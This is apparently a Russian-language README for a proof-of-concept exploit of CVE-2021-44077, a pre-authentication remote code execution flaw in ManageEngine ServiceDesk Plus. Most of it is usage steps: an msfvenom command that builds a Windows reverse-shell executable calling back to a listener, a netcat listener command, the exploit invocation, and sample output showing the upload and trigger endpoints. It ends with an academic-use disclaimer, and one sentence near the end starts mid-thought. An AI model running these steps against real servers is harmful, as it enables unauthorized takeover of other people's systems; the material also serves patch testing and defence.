
Эксплойт PoC для ManageEngine ServiceDesk Plus CVE-2021-44077
Эксплойт Proof of Concept для CVE-2021-44077: PreAuth RCE в ManageEngine ServiceDesk Plus < 11306
Основано на:
Рекомендации CISA:
Устранение (обновление до сборки 11306 или выше):
Протестировано на ManageEngine ServiceDesk Plus сборка 11303. Все антивирусы отключены.
Эксплойт загружает исполняемый файл Windows на цель и запускает его.
Для эксплуатации сначала сгенерируйте любой исполняемый файл. Например:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
Выполните pip install -r requirements.txt или убедитесь, что у вас установлен пакет requests.
Если вы пытаетесь перехватить обратную оболочку, сначала запустите слушатель, например:
nc -l 4444
Затем запустите скрипт эксплойта, передав аргументы url и exe, например:
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
Пример вывода скрипта:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin установки, включая существующие файлы, такие как пакетные скрипты. Могут быть и другие способы вызова загруженного файла.Данное программное обеспечение создано исключительно в целях академического исследования и разработки эффективных методов защиты и не предназначено для использования для атаки на системы, за исключением случаев явно выраженного разрешения. Разработчики проекта не несут ответственности за неправомерное использование данного программного обеспечения. Используйте ответственно.